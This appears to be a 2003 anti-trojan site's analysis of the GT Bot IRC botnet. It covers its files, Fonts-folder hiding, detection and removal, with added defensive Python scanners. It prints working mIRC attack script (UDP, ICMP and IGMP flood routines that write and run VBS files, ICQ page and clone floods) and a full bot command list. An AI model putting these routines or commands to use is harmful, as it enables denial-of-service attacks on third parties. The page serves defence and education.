SwatIt Anti Trojan and Bot Scanner and Remover
BOTS


Bots, Drones, Zombies, Worms and other things that go bump in the night.

GT Bot (Global Threat)

GT Bot (Global Threat) first appeared nearly two years ago and was written by Sony, mSg and DeadKode. GT Bot uses the legitimate mIRC program as its core, together with a program called HideWindow that makes mIRC invisible on the host computer. mIRC is scripted to act as an IRC Bot which responds to remote commands from the Bot Master. When run, mIRC loads the scripts and the HideWindow program, connects to the predetermined IRC server and channel, and waits for commands. As the scripts are open source, it is very easy to rewrite or edit them with your own variations and custom command triggers. This is done often and accounts for the large number of variants of this bot. Some have undergone simple edits while others are far more creative, with additional scripts and routines; some even have encryption added to protect logins and access to commands. In some places GT Bot has also been referred to as Aristotles or IRC Trojan Aristotles. This is still GT Bot: the name comes from a widespread variant that was controlled by the nickname Aristotles. The most popular variant of GT Bot uses the filenames listed below.

temp.exe (This is mIRC32.exe)
temp2.exe (This is HideWindow)
mirc.ini (The main *.ini)
mirc2.ini (script)
mirc3.ini (script)
script.ini (script)
pr.ini (script)
gates.txt (script)
temp.scr (nicknames list)
WHVLXD.DAT (registry key info)
WHVLXD.EXE (registry key creator)

A more complete list of known GT Bot filenames, which will help indicate a possible infection, can be found here.

As noted earlier, many variants exist and it is all too easy to change the names of the files and their extensions. One filename that endures through nearly every version is MIRC.INI, because by default mIRC needs this file to load properly; if it does not find one, it creates a new one, which would stop the Bot from launching. A search of the hard drive for mirc.ini reveals the location of each copy of mIRC, as the two must exist in the same directory. If you have one version of mIRC installed and a search reveals two mirc.ini files, it is possible you have a GT Bot infection. Simply counting the number of mirc.ini files against the number of mIRC installations you can account for reveals a lot of these infections easily. mIRC can be hex edited to look for a file other than mirc.ini when it loads; I have seen this done in a few cases and have examples of this variant. Only a very small percentage have done this, so the mirc.ini search is always the best initial method to use when looking for a GT Bot infection. One example of a bot that had been hex edited to load a file other than mirc.ini used the filename slave.fnt, along with many other files using the made-up *.FNT extension. I will be listing a lot of the default names that these files use so that it provides a useful reference when searching. However, this is not a fixed, set-in-stone guide, because names and extensions are so easy to change and are often changed.

GT Bots are installed into various paths, the most popular being the Windows and Windows\System directories. Some of the smarter versions of GT Bot hide in the C:\Windows\Fonts directory, and for a good reason: if you open C:\Windows\Fonts in the normal view, you will not see executables, scripts or other directories in there. It has become a popular hiding place for GT Bot. Windows Explorer will show these hidden files or directories, and so will MS-DOS mode. I will provide examples below.

To find hidden directories in the Fonts directory, go to the C:\ drive, open the Windows directory and then open the Fonts directory. Leaving Fonts as the focused window on top, click on the Windows Start button and go to Run. A run prompt will appear; type the word "command" without the quotes into the box and click OK. You should see an MS-DOS prompt window appear showing C:\Windows\Fonts>. Now type "DIR/P/W" without the quotes and you will see a directory listing. Look closely for names in [ ], as these indicate directories. You should see [ . ] and [ .. ], which can be disregarded, but beware of any other directories in there. In the illustration below you will see [ GTBot ], which is a directory I created in there as an example by doing "mkdir GTBot". With GT Bot infections a directory called FONT will often exist inside the real Fonts directory, and this is where the Bot is often hidden. To access it in a normal view, go to Start, then Run, and type the full path, for example C:\Windows\Fonts\GTBot, then click OK and it will open that directory. A lot of the files will be hidden files, so it is wise to use Folder Options to show hidden and system files and to show file extensions for known file types. Some bots are a little more devious and will create a directory inside Fonts with a name like VerdanaLarge.ttf, so at a quick glance it looks like a font file, but the [ ] around the name will always give it away as a directory and you should take note of this.

To show all files and file extensions, click on Start, then Settings, then Folder Options (see figure 1). The Folder Options window should then appear (see figure 2). Click on View, the centre one of the three tabs, then check the Show All Files radio button and uncheck the Hide file extensions for known file types check box.

If a GT Bot is found it can be dealt with in a few ways. One is to use a process viewer to kill the hidden processes it is running and then delete all of its files. Alternatively, a Trojan scanner will sometimes detect some of the files and remove them. Remember that because GT Bot is so widespread and easy to edit, many variants will exist that could not possibly be detected by standard signature file scanning, and this is why the use of a process monitor is by far the best method, from my own experience in dealing with dozens of these GT Bots.
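The three file-system checks described above (counting mirc.ini copies against known mIRC installs, looking for directories hiding inside the Fonts folder, and searching for the default GT Bot filenames and the icmp.vbs/igmp.vbs/igmp.exe helpers) as an added triage script. This is example code written for this page, not part of SwatIt; the directory tree it scans is constructed inline and stands in for a C:\ drive, and the expected number of mIRC installs is an assumed parameter.

```python
"""Offline triage of a Windows directory tree for the GT Bot indicators
described in the text. Example code written for this page, not SwatIt code."""
import os
import tempfile
from pathlib import Path

# Default filenames named in the text, plus the VBS/EXE attack helpers (lower-case,
# because Windows filenames are case-insensitive). These are indicators, not proof.
GTBOT_NAMES = {
    "temp.exe", "temp2.exe", "mirc2.ini", "mirc3.ini", "script.ini", "pr.ini",
    "gates.txt", "temp.scr", "whvlxd.dat", "whvlxd.exe", "slave.fnt",
    "icmp.vbs", "igmp.vbs", "igmp.exe",
}


def scan_tree(root, expected_mirc_installs=1):
    """Walk `root` (stands in for C:\\) and return a dict of findings."""
    root = Path(root)
    findings = {"mirc_ini": [], "fonts_subdirs": [], "known_names": [], "extra_mirc": 0}
    fonts_dir = root / "Windows" / "Fonts"
    for dirpath, dirnames, filenames in os.walk(root):
        dp = Path(dirpath)
        # Check 2: the real Fonts folder should contain no subdirectories at all.
        # The name is not trusted: a directory called VerdanaLarge.ttf is still a directory.
        if dp == fonts_dir:
            findings["fonts_subdirs"].extend(str(dp / d) for d in sorted(dirnames))
        for name in filenames:
            low = name.lower()
            if low == "mirc.ini":
                # Check 1: each mirc.ini marks one mIRC directory.
                findings["mirc_ini"].append(str(dp))
            if low in GTBOT_NAMES:
                # Check 3: default GT Bot filenames and attack helpers.
                findings["known_names"].append(str(dp / name))
    # More mirc.ini copies than installs you can account for is the key signal.
    findings["extra_mirc"] = max(0, len(findings["mirc_ini"]) - expected_mirc_installs)
    return findings


def build_sample_tree(base):
    """Construct a toy tree: one legitimate mIRC install plus a bot hidden in Fonts."""
    base = Path(base)
    legit = base / "Program Files" / "mIRC"
    hidden = base / "Windows" / "Fonts" / "VerdanaLarge.ttf"   # a directory, not a font
    for d in (legit, hidden):
        d.mkdir(parents=True, exist_ok=True)
    (legit / "mirc.ini").write_text("[mirc]\n")
    (base / "Windows" / "Fonts" / "arial.ttf").write_bytes(b"\x00")  # real font, ignored
    for f in ("mirc.ini", "temp.exe", "temp2.exe", "gates.txt", "icmp.vbs"):
        (hidden / f).write_text("constructed sample file\n")
    return base


def triage_sample():
    """Run the scan against the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_tree(tmp), expected_mirc_installs=1)


if __name__ == "__main__":
    result = triage_sample()
    print(f"mirc.ini copies: {len(result['mirc_ini'])} (unaccounted: {result['extra_mirc']})")
    for path in result["fonts_subdirs"]:
        print("directory inside Fonts:", path)
    for path in result["known_names"]:
        print("known GT Bot filename:", path)
```

On a real machine, call scan_tree with the drive root and the number of mIRC installs you can account for; anything in fonts_subdirs or extra_mirc above zero deserves a closer look with a process viewer.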

When GT Bots connect to IRC, they are usually logged into by their Master, who then issues them with commands. You will get a clearer picture of this by looking at the screen captures [URL], which show various activity from spamming and flooding to all-out DDoS attacks. A lot can be learned about the structuring of BotNets by observation, if you are able to track them down. Typically, GT BotNets can be traced in only a matter of minutes by reading the script files after the Bot package has been executed and extracted. All of the connection information is within the scripting, often in the remote.ini: the IRC server address (usually a dynamic address), the channel to join, and the nickname, ident and real name criteria for the Bot to assume when executed. Dynamic addresses are often used so that BotNets can be redirected to other IRC servers; I have explained more about dynamic addresses [here URL], because they are relevant to all types of bots. On IRC servers that are owned and operated by the BotNet Master, great lengths are often taken to hide the channel that the Bots join and to secure it from curious people accidentally finding or stumbling across it.

Often, channel names are used which contain special characters such as #Ãßÿ¥¤¢š¿øùô, with a channel key that again uses special characters like ¥ðæÅÞ ‡. So to join the channel you would have to type /join #Ãßÿ¥¤¢š¿øùô ¥ðæÅÞ ‡, which is /join <#chan> <key>. I explain IRC modes and what they do, with more relevant information, [hereURL], as again this applies to all genres of Bots. The IRCD (IRC server software) of choice is usually Unreal IRCD [URL http://www.unrealircd.com], as it is easy to set up and configure and has some rather unique modes unavailable in other similar IRCD software. These include +u, which hides the user nickname list from anyone that joins the channel, giving the appearance that the channel is completely empty, and host masking, which stops a person from obtaining IP addresses. Even if the channel had several hundred Bots in it, they would remain invisible unless you know the workarounds, which I describe in the IRC modes section.

Once logged into, the Bots can be commanded with trigger commands sent to the IRC channel. The bot will normally respond to certain trigger words that the script is monitoring the channel for. For example, here is a snippet of code from a GT Bot and an explanation of what it does.

if ($1 == !icqpage) { if ($2 == $null) { /msg # Error/Syntax:(!icqpage from subject body to) | halt } { .set %icqfrom $2- | .set %icqsubject $3- | .set %icqbody $4- | .set %icqto $5 | .sockclose mICQ* | .timer 1 3 .sockopen mICQ wwp.icq.com 80 } }

When a Bot Master sends the text "!icqpage from_me the_subject a_pager_for_you 111111111111", the Bot will open a connection to wwp.icq.com on remote port 80 and send that string of information, and will even prompt the user if they mis-entered the information. Each time that command is sent, ICQ account 111111111111 would get one WWW Pager from each Bot. Several hundred Bots doing this repeatedly would generate quite a huge flood of these pagers. At the receiving end they can easily all be closed at once or added to ignore, but it is still somewhat annoying to the target. Worse are the DDoS attacks these can create, with various different types of built-in attacks. I will briefly try to explain some of them below.

Packet Of Death: This piece of code generates UDP packets to random ports in the range 1000 - 6669, of user-inputted size and amount. "!packet 10.0.01 9999 3000" would attempt to send 9999 bytes of data 3000 times to IP address 10.0.01 on random ports between port 1000 and port 6669. Once again, if the information is entered incorrectly, the GT Bot will message the channel and report the correct syntax to use. When the attack has finished, the GT Bot will message the Master that it has completed its task and is ready to accept further orders.

alias packetofdeath {
if ($3 = $null) { notice $nick Error Please use !packet address size amount | halt }
if ($chr(46) !isin $1) || ($2 !isnum) || ($3 !isnum) { notice $nick Error Please use !packet address size amount | halt }
if ($remove($1,$chr(46)) !isnum)
{ notice $nick Error no letters may be contained in the ip | unset %packet.* | halt }
.notice $nick Now Packeting $1 with $2 bytes $3 times
set %packet.ip $1
set %packet.bytes $2
set %packet.amount $3
set %packet.count 0
set %packet.port $rand(1,6) $+ $rand(0,6) $+ ($rand(0,6) $+ $rand(0,9)
:start
if (%packet.count >= %packet.amount) { sockclose packet | unset %packet.* | .notice $nick Packeting has completed | halt }
inc %packet.count 1
/sockudp -b packet 60 %packet.ip %packet.port %packet.bytes %packet.bytes
goto start

ICMP: an ICMP attack allowing variable packet sizes and amounts, which writes and runs a VBS file that in turn runs PING.EXE with parameters. On command, this piece of code sends a ping flood of user-definable size and amount to the target IP address. As you can most likely imagine, it hardly takes a genius to figure out that many machines sending a lot of malicious traffic can easily cause chaos and take down high-bandwidth targets very effectively, even if they are dropping the ICMP at the router. The effect is like someone snorkel diving: if your snorkel becomes full of water, you can close your mouth to stop yourself swallowing the water, but you still cannot breathe.

This form of attack is generally referred to as a bandwidth saturation attack, because it stops any useful data from getting in or out as it completely fills the pipes. When this command is run, it removes icmp.vbs if it exists and writes a new file called icmp.vbs, which it then runs. Once icmp.vbs has been run, it in turn runs PING.EXE with the parameters

"PING -N <Number of Packets> -L <Size in Bytes> -W 0 <IP Address of Target>"

The parameter -W is set to 0. This is the timeout to wait for a reply before sending the next echo request, so a value of 0 means it will send a constant stream instead of waiting for a reply to the last echo. See image here.

Against this form of attack, a firewall would stop the pings reaching the machine, and the machine would run normally behind the firewall, unaffected by the attack, but with no real communication with the Internet: effectively silenced or offline to anybody trying to access it remotely. If it is a machine providing web services, such as a website, this can be catastrophic financially for a business, with the web site completely inaccessible. It might as well be switched off or unplugged from the network while the attack rages on. Most DDoS attacks die out eventually, usually when the attacking machines go offline or the owner realizes that they are attacking someone. Of course, attacks such as this can be successfully filtered upstream of the target by the Internet Service or upstream provider, as long as the specific attack can be identified and a ruleset crafted for it.

It would be worth checking any machine for the existence of ICMP.VBS to make sure it is not taking part in malicious attacks.

if ($1 == !icmp) { if ($2 == $null) { /msg # Error/Syntax:(!icmp ip packetsize howmany, ie: !icmp 127.0.0.1 2000 1000) | halt }| .remove icmp.vbs | .write icmp.vbs Set src3 = CreateObject("Wscript.shell") | .write icmp.vbs src3.run "command /c ping -n $4 -l $3 -w 0 $2 ",0,true | .run icmp.vbs }

IGMP: an attack that uses a third-party DOS-based IGMP tool to send malicious fragmented IGMP packets to the target machine. This routine is almost identical to the one above, only it runs a third-party tool called IGMP.EXE which has preset parameters and only needs the IP address to be inputted. Fragmented IGMP packets will often cause unpatched Windows 98 machines to BSoD (Blue Screen of Death) or, in some cases, force a reboot. This form of attack will again saturate bandwidth, even if the target is protected from IGMP protocol packets. As with the ICMP attack above, a search for IGMP.VBS and IGMP.EXE is always worthwhile to make sure that the machine is not being made to send malicious traffic to third parties.

if ($1 == !igmp) { if ($2 == $null) { /msg # Error/Syntax:(!igmp ip.here) | halt } | .remove igmp.vbs | .write igmp.vbs Set src3 = CreateObject("Wscript.shell") | .write igmp.vbs src3.run "command /c igmp $2 ",0,true | .run igmp.vbs }

Other similar attacks that are often included are Pepsi, Shiver, Fraggle and ATH0 (aimed at machines with a dialup connection; "ATH0" is the modem command to hang up, i.e. disconnect).

GT Bot is also used very widely to attack other IRC networks by flooding channels with huge amounts of text or messages to individual users. A lot of these attacks can be ignored on a small scale, but on a large scale they cause wide-scale IRC server disruption and, in many instances with lower-bandwidth providers, will bring down the whole server and any others running on the same network.

IRC.DAL.NET, arguably the largest IRC chat network, has been plagued with many different variants of GT Bot as well as many other varieties. They have a dedicated team of IRC Operators forming the DALnet Exploits Team, which works almost full time dealing with BotNets and other malicious traffic. DALnet currently boasts over 600,000 registered users and over 80,000 concurrent chatters. [http://www.dal.net/index.php3]

We have many times had the pleasure of working closely with the DALnet Exploits Team in the role of consultant, to examine new BotNets and make sense of what the thing actually is and does, how it gets its instructions, and what steps could be taken to get rid of it and deter more from arriving. This has given me much opportunity to further my studies of BotNet structuring, protocol and behavior, and allowed me to see possible solutions to certain problems. Channels are generally secured and closed off to stop more Bots from joining, or to stop people from exploiting these infected machines. We also interviewed a few members of the DALnet Exploits Team, and you can read what they had to say about the problem from their own experiences.
| Fruit^Loop | Barbara | Melech |

DALnet has a responsible attitude towards exploits and feels that prevention is always better than cure, and that educating the users is by far the best policy they could possibly adopt. Much of the work that the Exploits Team carries out is confidential, and I will not be discussing the techniques that are adopted to detect exploit channels or the policies that are in force to prevent exploited hosts from connecting. DALnet has many times been flooded by CLONES (Bots spawning more offspring by multiplying themselves).

If a BotNet of 200 GT Bots created 5 clones each to join an IRC server, that would generate a total of 1000 connections. Most small IRC servers allow 256 simultaneous connections, up to a maximum of 1024. A large amount of this form of traffic rapidly uses all of the available ports, and in a lot of cases the whole lot hitting almost all at once will stall the whole server. GT Bots often enter an IRC network in huge numbers, then join target channels and flood them with endless repetitive data, which causes normal users to become disconnected or their IRC client to freeze because it cannot process the rapidly scrolling flood of garbage data fast enough. These kinds of floods often run up to 150 kbps of data through the IRC server and will often incur penalties for the owner of the free service for extra bandwidth consumption.

If IRC servers are repeatedly attacked, the hosting company will often terminate the account, which is really a case of the victim being further victimized, but the hosting company does have a responsibility to its other users to maintain a reasonable level of useful service. In the case of DALnet, many IRC servers were de-linked from the network after a torrent of different attacks, as the administrators could not cope with the constant deluge of packets and clone floods.

A variant of GT Bot was in the process of creation by BootError, with a client to control it. The application was never actually completed or distributed, but it caused quite a stir when it was suggested that it might be used to take down DALnet (here). Follow-ups to the incident can be found here, reporting the arrest of the 16-year-old BootError by the FBI concerning the Gods Wrath affair. No charges have actually been brought against BootError as yet, even after the several-month investigation, although it is still pending. It was widely covered by the media at the time, and also widely exaggerated as a scheme to take down the entire Internet.

A few hundred or even a few thousand GT Bots can certainly do an awful lot of damage, but taking down the whole Internet is about a million times exaggerated. Given that this tool had but one day to be spread, it would be a near impossibility, and you would stand more chance of winning the lottery 3 times consecutively than of seeing it happen.

From my own personal studies of BotNets, I have seen many evolve and grow from nearly nothing, because I have sometimes found them within hours of their first being created. By far the most successful and largest BotNets, and those that have grown the most rapidly, have been ones that piggybacked on some other vulnerability: acting like a worm to infect insecure Windows 2000 IIS (Internet Information Server) machines, or infecting hosts with existing Trojan infections such as SubSeven. [Interview with mobman the SubSeven author here URL] Below is a paste of some of the garbage data that Bot FloodNets often send to IRC channels and users. Imagine this data being sent constantly, over and over again, by a large number of clones until the attack is called off or the IRC server goes offline.

On larger networks such as DALnet, server floods are detected and channel or server flood protection is automatically activated, giving IRC Operators the chance to get on top of the attacks, disconnect the rogue attacking machines from the network, and implement bans to stop the same hosts from reconnecting. This is why gates.txt is often included with GT Bot. Gates.txt is a list of port 1080 WinGate proxies which clones are often loaded through, and fast *.EDU hosts can often produce very large numbers of these clones.

Pure Pewp
/timer 1 5 /sockwrite -n $sock(clone*,%cc) PRIVMSG $2
p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w pp e wp p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p

Death by Math
/timer 1 16 /sockwrite -n $sock(clone*,%cc) PRIVMSG
$2 ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼
½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾

GT Special
/timer 1 22 /sockwrite -n $sock(clone*,%cc) PRIVMSG $2
3GT 4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT
4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT

Often a BNC (bouncer for IRC) is used to load clones onto IRC networks; this works in a very similar way to loading clones via a WinGate. It is done to evade various bans which may be in effect and to be able to reconnect clients from banned hosts or domains.

These bots have nearly the same capability as common mid-range Trojans and can gather various information about the system they are installed on and output it to an IRC channel. An example can be seen below from a version that we tested on one of our laboratory machines.

Info Date:[Monday September 10 2001] Time:[09:42 pm] OS:[Windows98] UpTime:[55mins 36secs] Current-URL:[http://pv1fd.pav1.hotmail.msn.com/cgi-bin/HoTMaiL?curmbox=F000000001&a=853e1cbe0240dc4d970aac200fec8216&_lang=EN]
Name: LockDownLaboratory()ICQ:[1111111111.uin] Key[H922W2R887TH2KDDPCP9F8FDH]

ICQ Number and Windows product key edited for security purposes.

Other information can also be easily gathered, including the size of logical drives, space used and remaining space, connection type and up and down speed, available RAM and CPU speed. This is usually done by adding ready-made *.dll files such as moo.dll or info.dll to the package, calling the *.dll and outputting the result to the Bot channel. Many bots also search for media files such as *.mpg, *.mpeg, *.rm, *.ram and *.mp3 and serve them on IRC as fileservers, or can just open an fserv on drive C:\ or any other available drive. (FServ is the IRC equivalent of FTP, only as a read-only service.)

The ability to delete or run commands and files is also usually included in GT Bot, and many also have a web downloader included so that on command it can fetch a predetermined update or new version and then install it. Some have the ability to write new scripts, so all the Master has to do is give the GT Bot a new script to load by pasting it line by line into the channel. The Bot will then write the script, it can be loaded, and the newly added commands become accessible.

GT Bot is often used to scan for Trojan-compromised hosts and then outputs the IP address of any hosts found into the channel. Some even go as far as to connect to SubSeven infections and update them from the web with a GT Bot which, once successfully downloaded, will be run and will remove the SubSeven infection and replace it.

Conclusion

It can be safely concluded that the spread of these Bots and the number of variants is set to increase significantly in the next year or so, until the public as a whole becomes more aware of the threat and takes proper action to avoid infection. With the increase in the number of BotNets there will also be an increase in the number of DDoS attacks reported, as the two go hand in hand. It is evident that awareness and education is the best policy that can be adopted.


Some of the standard commands from GT Bot can be seen below.

!portredirect
!portredirect help
!portredirect add <localport> <remotehost|ip> <remoteport>
!portredirect stop <localport>
!portredirect stats

!pfast
usage: (udp flood)
!pfast stop
!pfast <number of packets> <dest host> <dest port>

!var
usage:
!var <mirc internal variable>

!stopscan
no usage, stops all scans.

!scan
usage:
!scan <ip.*> <port>
!scan 1.1.1.* 31337


!quit
(will make mirc /quit if the address of the user = %master)
usage:
!quit <msg>

!fileserver.access
no usage, if the address of the user = %master, then they can spawn an fserve from the root of C:\.

!up
attempts to op the $nick in the current channel.

!exit
if the address of the user matches the master address (masteraddy), then the client will exit.

!max.load
usage:
sets the maximum number of clones.
!max.load <number>

!mode
usage:
sets a mode on a channel or nick.
!mode <#channel|nick> <+|-|smkiplnb> <address>

!voiceme
no usage, attempts to get voice on the current channel.

!down
no usage, attempts to deop, and voice on the current channel.

!avoice
usage:
adds/removes a nick from the autovoice list.
!avoice <add|del> <nick>

!aop
usage:
adds/removes a nick from the autoop list.
!aop <add|del> nick

!add.user
usage:
adds a user at level 10, if $address matches %master.
!add.user <nick>

!add.alias
usage:
attempts to add an alias for mirc.
!add.alias <new alias>

!rem.user
usage:
removes a user from level 10, if $address matches %master.
!rem.user <nick>

!packet
usage:
starts a denial of service (ping.exe) attack on a specified ip, if $address matches %master.
!packet <ip> <number>

!clone.status
no usage, provides statistics on the number of clones currently loaded.

!jump-server
tells the client to jump irc server if the $address matches %master.
usage:
!jump-server <server> <port>

!add.server
tells the client to add an irc server to its server list, if the $address matches %master.
usage:
!add.server <host|ip> [port] [password]

!server.list.clear
no usage, tells the client to remove the server list (servers.txt), if the $address matches %master.

!reload!
no usage, tells the client to reconnect to the current irc server in 15 seconds, if the $address matches %master.

!wingate.load
no usage, loads a wingate floodnet using the wingates in gates.txt.

!join
usage:
!join <#channel>

!part
usage:
!part <#channel>

!cycle
parts then joins a selected channel.
usage:
!cycle <#channel>

!op,!deop,!devoice,!voice
attempts to op/deop/devoice/voice a user in a certain channel.
usage:
!op <#channel> <nick>
!deop <#channel> <nick>
!devoice <#channel> <nick>
!voice <#channel> <nick>

!kick
attempts to kick a user from a certain channel.
usage:
!kick <#channel> <nick> <message>

!info
no usage, gives information about the client such as:
date, time, os (which type of windows), uptime, number of .mp3s, number of .exe's, number
of .mpg's, number of .asf's and which url the client it currently viewing.

!kick/ban
attempts to kick and ban a user from a certain channel if the $address matches %master.
usage:
!kick/ban <#channel> <nick> <message>

!clone.flood.ctcp.all
attempts to flood a user|channel with ctcp requests.
usage:
!clone.flood.ctcp.all <#channel|nick>

!clone.flood.ctcp.version
attempts to flood a user|channel with ctcp version requests.
usage:
!clone.flood.ctcp.version <#channel|nick>

!clone.flood.ctcp.ping
attempts to flood a user|channel with ctcp ping requests.
usage:
!clone.flood.ctcp.ping <#channel|nick>

!clone.flood.ctcp.time
attempts to flood a user|channel with ctcp time requests.
usage:
!clone.flood.ctcp.time <#channel|nick>

!clone.service.killer
no usage, attempts to flood ChanServ and NickServ by registering random channels and nicknames.

!clone.load
attempts to load a set amount of clones on a selected server.
usage:
!clone.load <hostname|ip> <port> <number of clones>

!clone.load.random
attempts to load a certain amount of clones into a random server.
usage:
!clone.load.random <hostname|ip> <port> <number>

!clone.part,!clone.join
attempts to get the clones to join/part a certain channel.
usage:
!clone.part <#channel>
!clone.join <#channel>

!clone.dcc.chat,!clone.dcc.send
attempts to flood a user with dcc sends/chats.
usage:

!clone.dcc.chat <nick>
!clone.dcc.send <nick>

!nick
attempts to change the nickname of the clones to <$2><random number>
!nick <nickname>

!clone.join
attempts to get the clones to join a certain channel.
usage:
!clone.join <#channel> [key]

!msg
attempts to get the client to send a privmsg to a nick or channel.
usage:
!msg <#channel|nick> <text>

!clone.cycle
attempts to get all the clones to part/join a certain channel.
usage:
!clone.cycle <#channel>

!clone.msg
attempts to get the clones to send a privmsg to a nick or channel.
usage:
!clone.msg <#channel|nick> <text>

!clone.quit
attempts to make all the clones quit irc.
usage:
!clone.quit [message]

!clone.notice
attempts to make all the clones send a notice to a nick or channel
usage:
!clone.notice <#channel|nick>

!clone.nick.flood
no usage, attempts to get the clones to nickflood.

!clone.nick
changes a clone's nick (calls /clone nick.this with the given nick; halts if none is given).
usage:
!clone.nick <nick>

!clone.kill
attempts to kill all the clones.

!clone.combo1,!clone.combo2,!clone.combo2,!clone.combo4,!clone.combo5,!clone.combo6,!clone.combo#,!clone.combo.word,!clone.combo.ultimate
various types of privmsg floods using bold and colour control characters.

!clone.c.flood
constant flood, sets a timer to continually flood a channel or nick.

!flood.stop
stops the above flood.

!super.flood
another flood type.

!super.flood.stop!
stops the above flood.

!ver
shows the version number of the "Remote flooder", in this case version: 0.9.0.1

!credits
shows the credits, presumably the authors, in this case: DK,\mSg,Sony

!-
executes any command on the remote computer/mirc client if the $address matches %master.

!bnc
usage:
!bnc stats, shows statistics for the bnc.
!bnc log, starts logging to bnc.log if $address is %master.
!bnc start <port> <password>, starts a bnc on <port> with <password>
!bnc stop <port>, kills the listening bnc on <port>
!bnc kill users, if $address is %master, it kills all listening and active bnc's.
!bnc shutdown, if $address is %master, it shutsdown the bnc server.
!bnc list bnc, lists all the listening bnc ports.
!bnc list users, lists all the users currently using the bnc(s).
!bnc list servers, lists all connects to remote servers.

!icqpagebomb
usage:
floods a certain user(uin) on ICQ. via www.icq.com
!icqpagebomb <uin> <amount> <email/name> <sub> <message>

!login <interesting one>

usage:
"!login Wasszup!" adds your *!*ident@*.host.com as level 10.
"!login grrrr yeah baby!" sets you as %master

!portscan
usage:
!portscan <ipaddress> <startport> <endport>

!update
attempts to get an update from a webpage, if your address matches %master.
usage:
!update <url>
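Because every GT Bot command above is a bare !trigger sent as a PRIVMSG to the Bot channel (and mIRC's == comparison is case-insensitive), a defender watching IRCD logs or a network tap can flag them directly. The script below, written for this page and not part of SwatIt or any IRCD, parses raw IRC PRIVMSG lines, extracts the trigger and groups it by the classes used in the text (DoS, clone flooding, master control); the grouping is my own, and the sample lines, nicks and hosts are constructed placeholders.

```python
"""Flag GT Bot trigger commands in captured IRC traffic.
Example code written for this page; not SwatIt code. Sample lines are constructed."""
import re

# Grouped from the command reference above; anything else starting with "!" is "other".
DOS_TRIGGERS = {"!packet", "!pfast", "!icmp", "!igmp", "!icqpage", "!icqpagebomb",
                "!portscan", "!scan"}
CLONE_TRIGGERS = {"!clone.load", "!clone.load.random", "!clone.c.flood", "!super.flood",
                  "!clone.nick.flood", "!clone.service.killer", "!wingate.load"}
CONTROL_TRIGGERS = {"!login", "!update", "!-", "!add.user", "!rem.user", "!jump-server",
                    "!add.server", "!reload!", "!fileserver.access", "!bnc", "!portredirect"}

# :nick!ident@host PRIVMSG target :text
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)!(?P<ident>[^@\s]+)@(?P<host>\S+)\s+PRIVMSG\s+"
    r"(?P<target>\S+)\s+:(?P<text>.*)$")


def parse_privmsg(line):
    """Return the fields of a PRIVMSG line as a dict, or None for any other line."""
    m = PRIVMSG_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


def classify(text):
    """Map a message body to (trigger, class); (None, None) if it is not a trigger."""
    words = text.split()
    if not words or not words[0].startswith("!"):
        return None, None
    trig = words[0].lower()            # mIRC matches triggers case-insensitively
    if trig in DOS_TRIGGERS:
        cls = "dos"
    elif trig in CLONE_TRIGGERS or trig.startswith(("!clone.flood", "!clone.combo", "!clone.dcc")):
        cls = "clone-flood"            # the !clone.flood.ctcp.* and !clone.combo* families
    elif trig in CONTROL_TRIGGERS:
        cls = "control"
    else:
        cls = "other"
    return trig, cls


def looks_obfuscated(channel):
    """Channel names built from high-bit characters, as described in the text, are a hint."""
    return sum(ord(c) > 127 for c in channel) >= 3


def scan_lines(lines):
    """Return one alert dict per trigger message found in the input lines."""
    alerts = []
    for ln in lines:
        msg = parse_privmsg(ln)
        if not msg:
            continue
        trig, cls = classify(msg["text"])
        if trig is None:
            continue
        alerts.append({"nick": msg["nick"], "host": msg["host"], "target": msg["target"],
                       "trigger": trig, "class": cls,
                       "odd_channel": looks_obfuscated(msg["target"])})
    return alerts


# Constructed sample capture: a master logging in and issuing commands in an
# obfuscated channel, plus ordinary chatter and a server PING that must be ignored.
SAMPLE = [
    ":Aristotles!master@example.invalid PRIVMSG #Ãßÿ¥¤¢š¿øùô :!login grrrr yeah baby!",
    ":Aristotles!master@example.invalid PRIVMSG #Ãßÿ¥¤¢š¿øùô :!packet 10.0.01 9999 3000",
    ":Aristotles!master@example.invalid PRIVMSG #Ãßÿ¥¤¢š¿øùô :!clone.load irc.example.invalid 6667 5",
    ":alice!alice@example.invalid PRIVMSG #chat :hello everyone!",
    ":bob!bob@example.invalid PRIVMSG alice :did you see !that",
    "PING :irc.example.invalid",
]

if __name__ == "__main__":
    for a in scan_lines(SAMPLE):
        flag = " (obfuscated channel)" if a["odd_channel"] else ""
        print(f"{a['class']:<11} {a['trigger']:<12} from {a['nick']}@{a['host']} in {a['target']}{flag}")
```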





©2003 SwatIt.Org